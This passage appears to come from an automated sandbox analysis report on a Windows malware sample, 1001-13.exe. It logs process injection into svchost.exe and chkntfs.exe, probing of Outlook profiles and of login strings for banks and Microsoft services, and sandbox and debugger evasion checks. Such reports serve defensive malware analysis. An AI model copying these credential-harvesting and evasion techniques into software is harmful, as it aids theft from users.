                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 1001-13.exeStatic file information: File size 1616384 > 1048576
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OlGIUOYUZW.exe, 00000007.00000002.3993968948.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701407747.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E342DE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E50A76 push ecx; ret 0_2_00E50A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004179D0 push cs; ret 2_2_004179D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403250 push eax; ret 2_2_00403252
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A37 push eax; iretd 2_2_00418A41
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418AFA push ecx; iretd 2_2_00418B07
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414AA3 push edi; retf 2_2_00414AAE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040837A push D2B59A72h; retf 2_2_00408389
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412308 push ebp; iretd 2_2_00412331
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013D7 pushad ; iretd 2_2_004013DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E0 pushad ; iretd 2_2_004013E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D41F push 84DD7E08h; ret 2_2_0040D42B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040156D push dword ptr [eax-65h]; ret 2_2_00401577
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E64B push edx; retf 2_2_0041E650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E3D push ds; iretd 2_2_00417E3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016A0 push 905F3456h; iretd 2_2_004016AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414F5F push ds; ret 2_2_00414F61
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465DC36 push eax; iretd 7_2_0465DC40
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465DCF9 push ecx; iretd 7_2_0465DD06
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04659CA2 push edi; retf 7_2_04659CAD
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0464D532 push D2B59A72h; retf 7_2_0464D588
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04657507 push ebp; iretd 7_2_04657530
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465261E push 84DD7E08h; ret 7_2_0465262A
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465D03C push ds; iretd 7_2_0465D03D
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465A15E push ds; ret 7_2_0465A160
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0464C3C2 push ebx; ret 7_2_0464C4CC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465CBCF push cs; ret 7_2_0465CBD8
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E4F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E4F98E
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EC1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00EC1C41
                Source: C:\Users\user\Desktop\1001-13.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\1001-13.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96751
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\1001-13.exeAPI/Special instruction interceptor: Address: 1489F34
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: 1001-13.exe, 00000000.00000002.2158725984.0000000001414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEEX=
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Users\user\Desktop\1001-13.exeAPI coverage: 3.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI coverage: 2.9 %
                Source: C:\Windows\SysWOW64\chkntfs.exe TID: 3084Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exe TID: 3084Thread sleep time: -78000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe TID: 1464Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E6C2A2 FindFirstFileExW,0_2_00E6C2A2
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA68EE FindFirstFileW,FindClose,0_2_00EA68EE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00EA698F
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E9D076
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E9D3A9
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EA9642
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EA979D
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E9DBBE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00EA9B2B
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00EA5C97
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0058CFA0 FindFirstFileW,FindNextFileW,FindClose,8_2_0058CFA0
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E342DE
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 721e5H878.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 721e5H878.8.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 721e5H878.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 721e5H878.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 721e5H878.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 721e5H878.8.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3994740266.000000000072F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 721e5H878.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: firefox.exe, 0000000A.00000002.2921173288.000001F7E2A4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcc
                Source: 721e5H878.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 721e5H878.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 721e5H878.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 721e5H878.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 721e5H878.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 721e5H878.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 721e5H878.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 721e5H878.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 721e5H878.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 721e5H878.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 721e5H878.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 721e5H878.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418153 LdrLoadDll,2_2_00418153
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EAEAA2 BlockInput,0_2_00EAEAA2
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E62622
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E342DE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E54CE8 mov eax, dword ptr fs:[00000030h]0_2_00E54CE8
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_0148A1A0 mov eax, dword ptr fs:[00000030h]0_2_0148A1A0
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_0148A200 mov eax, dword ptr fs:[00000030h]0_2_0148A200
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_01488B90 mov eax, dword ptr fs:[00000030h]0_2_01488B90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
